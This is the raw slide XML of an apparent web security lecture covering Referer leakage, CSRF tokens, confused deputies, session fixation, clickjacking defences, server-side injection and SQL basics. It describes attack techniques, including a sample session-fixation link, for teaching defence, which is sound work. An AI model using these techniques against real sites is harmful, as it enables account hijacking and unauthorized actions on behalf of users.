              <a:t> Privacy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86195"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header can leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information from your browser to a website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine seeing an access log entry for a celebrity's Wikipedia entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>where...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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=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int.cia.gov/projects/hitlist.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common sources of blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP proxy at network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>perimiter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS → HTTP transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken user agents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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to mitigate CSRF may lead to false positives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ngry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>users, lost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Tokens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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1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sz="22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2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// ...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2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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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2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hidden“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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sz="22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"CSRF_TOKEN“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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 smtClean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"Ko7bgbjYr2+nqO7J7zIKbQ=="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Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> responses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to include a secret value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Unguessability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> implies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unforgeability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP prevents attacker from downloading the target form using code in your browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can't feasibly predict correct value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires rewriting app in most cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many web frameworks include CSRF token modules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roxy could also be used to insert and check tokens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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wrapup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requires a one-step, side-effecting action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks are blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>important_action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF is the dual of XSS is some ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In XSS, client trust in the server is violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In CSRF, server trust in the client is violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A classic example of a confused deputy attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The app is tricked into doing something it shouldn't do, even though it possesses the authority to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Architecture circa-1992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Side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Protocols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92165" y="3827733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Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Renderer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HTML Parser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3998262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HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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3774592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537258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Confused Deputies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67534"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original example due to Hardy in 1985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Compiler is installed in SYSX directory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Compiler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>has permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to write into SYSX directory, also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>users to pass a path for debug output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Billing information for company stored at SYSX/BILL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Malicious user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>gives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SYSX/BILL as the debug path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Compiler happily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overwrites the company's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>billing records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this example, the compiler is a confused deputy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricked into performing a malicious action that it had permissions to perform, but should not have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classic argument for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Fixation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lvl="0" indent="0" defTabSz="425195">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="330200" algn="l"/>
                <a:tab pos="660400" algn="l"/>
                <a:tab pos="990600" algn="l"/>
                <a:tab pos="1320800" algn="l"/>
                <a:tab pos="1651000" algn="l"/>
                <a:tab pos="1981200" algn="l"/>
                <a:tab pos="2311400" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2971800" algn="l"/>
                <a:tab pos="3302000" algn="l"/>
                <a:tab pos="3632200" algn="l"/>
                <a:tab pos="39624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"http://x.io/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login?sess_id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=12345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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4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400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Nyan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Cat Part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lang="en-US" sz="2400" dirty="0" smtClean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a&gt;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dirty="0"/>
              <a:t>There are many ways to get session cookies wrong, but here's one example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session fixation allows an attacker to fix a victim's session ID to a known value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker tricks victim into clicking on a link containing an attacker-supplied session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack requires IDs to be accepted from request parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web app must accept IDs it did not itself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>generate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Furthermore, session IDs in request parameters can leak via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header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Clickjacking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4211215"/>
            <a:ext cx="10887269" cy="2432181"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking, or UI redressing, is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the browser user interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker’s website loads a target site in an iframe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overlays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an invisible UI on top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the legitimate UI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User believes they're interacting with the visible layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, they're really interacting with the invisible one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="clickjacki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7642" y="576682"/>
            <a:ext cx="7541668" cy="34051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31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Clickjacking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 exploits the lack of a trusted path to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Websites may mix (and overlay) content from different origins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User has no reliable indicator to tell what origin they're </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interacting with</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack has been used in many ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricking users into disabling Flash security settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter worm propagation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facebook likes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>likejacking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Clickjacking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depends on hidden overlays, usually using frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can defend using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="452627">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/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(top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self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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top.location.replace</a:t>
            </a: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(location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-83928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Or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, use anti-framing security headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heuristic defenses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for invisible, high z-index frames (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ClearClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating trusted paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent windows/frames from occluding each other (Gazelle research browser)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Anti-Framing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ability to frame a site confers power to an adversary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Frame-Options is a recent security header that specifies a site's desired framing policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduced in IE8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RC1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser enforces the policy specified by the HTTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Frame-Options: DENY | SAMEORIGIN | ALLOW-FROM origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928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Web Servers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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CGI Shell Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unrestricted Uploads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 far, we have looked at client-side attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker wants to steal private info from the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker uses creative tricks to avoid SOP restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web servers are equally nice targets for attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Servers often have access to large amounts of privileged data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. personal information, medical histories, financial data, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Websites are useful platforms for launching attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. Redirects to drive-by installs, clickjacking, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389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Architecture circa-2015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4" y="2275968"/>
            <a:ext cx="893446" cy="89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2895" y="1508714"/>
            <a:ext cx="5955341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Side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62024" y="1507922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Protocols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62024" y="3399699"/>
            <a:ext cx="239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FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP 1.0/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Websocket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53" y="5116502"/>
            <a:ext cx="1043939" cy="10439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5400000">
            <a:off x="3530439" y="4322953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Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319024" y="3620770"/>
            <a:ext cx="2445499" cy="108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Application Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Java, PHP, Python, Node,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7" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8171741" y="2604732"/>
            <a:ext cx="1084225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853954" y="4163119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>
            <a:off x="4853954" y="5552011"/>
            <a:ext cx="3437850" cy="30465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7764523" y="4163119"/>
            <a:ext cx="942900" cy="95338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6" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7764523" y="3550456"/>
            <a:ext cx="949331" cy="61266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714279" y="4906893"/>
            <a:ext cx="1610849" cy="49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CGI Scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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4853954" y="5155379"/>
            <a:ext cx="860325" cy="144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7" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7325128" y="5156823"/>
            <a:ext cx="860325" cy="481649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Model-layer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95934"/>
            <a:ext cx="10515600" cy="1956713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web apps typically require a persistent store, often a relational database (increasingly not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structured Query Language (SQL) is a popular interface to relational </a:t>
            </a:r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794" y="1452120"/>
            <a:ext cx="6907190" cy="30095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87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HTML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Hypertext Markup Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>HTML 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 3.2  4.0  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>4.01 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>→ XHTML 1.1 → </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" strike="sngStrike" dirty="0"/>
              <a:t>XHTML 2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> → HTML 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Hierarchical tags (elements), originally based on SGML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Structure</a:t>
            </a:r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&lt;head&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> contains metadata</a:t>
            </a:r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&lt;body&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> contains content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9706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06908">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="304800" algn="l"/>
                <a:tab pos="622300" algn="l"/>
                <a:tab pos="939800" algn="l"/>
                <a:tab pos="1257300" algn="l"/>
                <a:tab pos="1574800" algn="l"/>
                <a:tab pos="1892300" algn="l"/>
                <a:tab pos="2209800" algn="l"/>
                <a:tab pos="2527300" algn="l"/>
                <a:tab pos="2844800" algn="l"/>
                <a:tab pos="3162300" algn="l"/>
                <a:tab pos="3479800" algn="l"/>
                <a:tab pos="37973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admin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users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="406908">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="304800" algn="l"/>
                <a:tab pos="622300" algn="l"/>
                <a:tab pos="939800" algn="l"/>
                <a:tab pos="1257300" algn="l"/>
                <a:tab pos="1574800" algn="l"/>
                <a:tab pos="1892300" algn="l"/>
                <a:tab pos="2209800" algn="l"/>
                <a:tab pos="2527300" algn="l"/>
                <a:tab pos="2844800" algn="l"/>
                <a:tab pos="3162300" algn="l"/>
                <a:tab pos="3479800" algn="l"/>
                <a:tab pos="37973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INSERT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INTO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users(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VALUES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'admin'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06908">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="304800" algn="l"/>
                <a:tab pos="622300" algn="l"/>
                <a:tab pos="939800" algn="l"/>
                <a:tab pos="1257300" algn="l"/>
                <a:tab pos="1574800" algn="l"/>
                <a:tab pos="1892300" algn="l"/>
                <a:tab pos="2209800" algn="l"/>
                <a:tab pos="2527300" algn="l"/>
                <a:tab pos="2844800" algn="l"/>
                <a:tab pos="3162300" algn="l"/>
                <a:tab pos="3479800" algn="l"/>
                <a:tab pos="37973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UPDATE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'...'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'admin'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406908">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="304800" algn="l"/>
                <a:tab pos="622300" algn="l"/>
                <a:tab pos="939800" algn="l"/>
                <a:tab pos="1257300" algn="l"/>
                <a:tab pos="1574800" algn="l"/>
                <a:tab pos="1892300" algn="l"/>
                <a:tab pos="2209800" algn="l"/>
                <a:tab pos="2527300" algn="l"/>
                <a:tab pos="2844800" algn="l"/>
                <a:tab pos="3162300" algn="l"/>
                <a:tab pos="3479800" algn="l"/>
                <a:tab pos="37973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DELETE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'admin'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Relatively </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>simple declarative language for definition relational data and operations over that data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note again a natural distinction between structure and content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common operations: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retrieves data from the store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT adds data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>store</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE modified data in the store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE removes data from the store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queries often involve untrusted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>App is often responsible for interpolating user data into queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insufficient sanitization could lead to modification of query semantics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality – modify queries to return unauthorized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity – modify queries to perform unauthorized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216"/>
            <a:ext cx="10515600" cy="558943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 smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
